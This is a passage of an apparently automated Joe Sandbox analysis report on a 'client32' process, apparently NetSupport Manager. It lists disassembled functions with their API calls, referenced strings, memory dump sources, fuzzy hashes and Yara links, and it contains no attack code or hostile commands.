Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok
String ID: ,=
API String ID: 1675499619-2677018336
Opcode ID: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
Instruction ID: feda1c23a4deb0c6415e8fc3f525424d3758ff44d9e037eb8c71fca6166ea7b8
Opcode Fuzzy Hash: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
Instruction Fuzzy Hash: 7111C266E0866B1FEB41CE699C11BCBB7D85F06259F04C0D5F95C9B341EA20F801C6E2

Function 1114F010 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1114F04C
_memmove.LIBCMT ref: 1114F086

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

n > 128, xrefs: 1114F066
..\ctl32\WCUNPACK.C, xrefs: 1114F061

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$ErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\WCUNPACK.C$n > 128
API String ID: 6605023-1396654219
Opcode ID: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
Instruction ID: df32f2f24868e4b0a831f81203bc5965ced63257c83ed47365b8bb2cf1ea103c
Opcode Fuzzy Hash: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
Instruction Fuzzy Hash: 37112976C0116677C3118E2D9D88E8BFF69EB81A68F248125FC9817741F731A61087E2

Function 11141170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 111411BA
_strtok.LIBCMT ref: 111411D6

Strings

..\ctl32\util.cpp, xrefs: 111411A0
,;, xrefs: 111411B2, 111411CC

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok
String ID: ,;$..\ctl32\util.cpp
API String ID: 1675499619-1361470564
Opcode ID: d9cb75963b6fd7e2dacd653054c4d8c3ba19de179d3a092770f0c3027d50ed67
Instruction ID: 3a21d0ed89595bcd9ff1dbda4637a27748d6098ff4eb0d40b20cf0eb11d9c026
Opcode Fuzzy Hash: d9cb75963b6fd7e2dacd653054c4d8c3ba19de179d3a092770f0c3027d50ed67
Instruction Fuzzy Hash: 770128B7B006473BD3011B7E6D40B9AF7AC8B81A58F184121FD58D7382EA21F909C2A6

Function 68C68B50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C68B68
wsprintfA.USER32 ref: 68C68B87

Strings

Gateway_Name, xrefs: 68C68B7D
%s_%d, xrefs: 68C68B81

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memsetwsprintf
String ID: %s_%d$Gateway_Name
API String ID: 1984265443-207007254
Opcode ID: 5851564235f8cb79e4fa9fc229d41ddf3d1bd9b8650ae29c6c897e4041011ff9
Instruction ID: 2fa92d45173cf95c9c30f3ac8d7cbb171295ea0a9d8875af201288abcd3e15e7
Opcode Fuzzy Hash: 5851564235f8cb79e4fa9fc229d41ddf3d1bd9b8650ae29c6c897e4041011ff9
Instruction Fuzzy Hash: A70142B5A00208EFDB00DF68DC81EBE77B8EB86308F804054ED169B241F630AE05C7A5

Function 11015020 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11015033, 110A9E03
..\ctl32\listview.cpp, xrefs: 110A9DFE
..\ctl32\liststat.cpp, xrefs: 1101502E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
API String ID: 819365019-2727927828
Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781

Function 1105D140 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,NSMCobrProxy), ref: 1105D150
DefWindowProcA.USER32(?,?,?,?), ref: 1105D168
DestroyWindow.USER32(?), ref: 1105D17C

Strings

NSMCobrProxy, xrefs: 1105D148

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$DestroyProcProp
String ID: NSMCobrProxy
API String ID: 3223085693-3894016192
Opcode ID: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
Instruction ID: 9c147f281cd98425ab9aa3ac9592e9bc4489785d07665bec5873f0907dac8d8d
Opcode Fuzzy Hash: 8721c0f0a996185e474c3a7b3ab1b583a274be32cc358fa53e7d83e36b3b3593
Instruction Fuzzy Hash: F9F0A0367011287BE7019E49DC84DFF7BACDBC6362B008066FA02C3241D7709812D7B1

Function 1101D100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D12F
ShowWindow.USER32(00000000), ref: 1101D136

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D111
m_hWnd, xrefs: 1101D116

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1319256379-1986719024
Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1

Function 1101D0B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D0DB
EnableWindow.USER32(00000000,?), ref: 1101D0E6

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D0C1
m_hWnd, xrefs: 1101D0C6

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
Instruction ID: 2b1270b1ce6598f01739890776adf1a6d9f8641e6ea7dfdd3b9eef3de0244db5
Opcode Fuzzy Hash: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
Instruction Fuzzy Hash: 45E02636A00329BFD310EAA1DC84F9BF3ACEB44360F00C429FA6583600CA31E84087A1

Function 11071000 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 430COMMON

Download Yara Rule

Strings

Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s, xrefs: 110713A0
Error %dz discarded %-4u bytes: %s, xrefs: 110710FC
%02x , xrefs: 110710DD

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: %02x $Error %dz discarded %-4u bytes: %s$Queue EV_CALLED_CONTROL: session=%d addr=%s extra=%s
API String ID: 0-2590468221
Opcode ID: 2e3534aeb3df88a7c50a6f40c060532129f5de801a3720064489155901deaf34
Instruction ID: 4770ed406c6fb7e57171b754325481176f8a5424b671cdabab32e7e093209ee6
Opcode Fuzzy Hash: 2e3534aeb3df88a7c50a6f40c060532129f5de801a3720064489155901deaf34
Instruction Fuzzy Hash: 63E15379F002119BDB24CF94CC90F6AB7AAFF89304F148299E9459F2C5DA30ED45CBA5

Function 68C8EB03 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 68C8EB9E
__flush.LIBCMT ref: 68C8EBBC
__write.LIBCMT ref: 68C8EBE3
__flsbuf.LIBCMT ref: 68C8EC0E

Part of subcall function 68C860F9: __getptd_noexit.LIBCMT ref: 68C860F9

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
Instruction ID: 7287fd90d48ac2b2ed354870b81224ef3f8ef4b719b73b9157cbbf71134a8835
Opcode Fuzzy Hash: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
Instruction Fuzzy Hash: 5541A4B1A80704DFDB148FA98844AAEBFB5FF8136CFA4856DD47597280F770D9428B44

Function 68C80080 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

std::exception::exception.LIBCMT ref: 68C800D2
__CxxThrowException@8.LIBCMT ref: 68C800E7

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: b2a5810e2247a526e4a4470eefe64c58292574c672a8bd050129f6e0bb432051
Instruction ID: 3a87cceb50534a7836646eea4e0350e278155c0ba1c532a27e3a727599635f7a
Opcode Fuzzy Hash: b2a5810e2247a526e4a4470eefe64c58292574c672a8bd050129f6e0bb432051
Instruction Fuzzy Hash: 054191B99042089FC714CF98D940BAABBF8FB19308F40455EE95997741E771FA04CBA1

Function 68C70B00 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

std::exception::exception.LIBCMT ref: 68C70BA3
__CxxThrowException@8.LIBCMT ref: 68C70BB8

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: b9e59a45b96bc69b0744d85bb2d01ebb254aad3585699f98aee219ba2983ac31
Instruction ID: ca15646ca3b1274cda8315dec0b674f8e6e5a3fc469cd49252bdc4c1d8d54d6b
Opcode Fuzzy Hash: b9e59a45b96bc69b0744d85bb2d01ebb254aad3585699f98aee219ba2983ac31
Instruction Fuzzy Hash: 77317EB6900609AFC724CF99D8409AFFBF8FF98614F40862EE55597700E774AA04CBA1

Function 68C7F9A0 Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

std::exception::exception.LIBCMT ref: 68C7F9F9
__CxxThrowException@8.LIBCMT ref: 68C7FA0E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
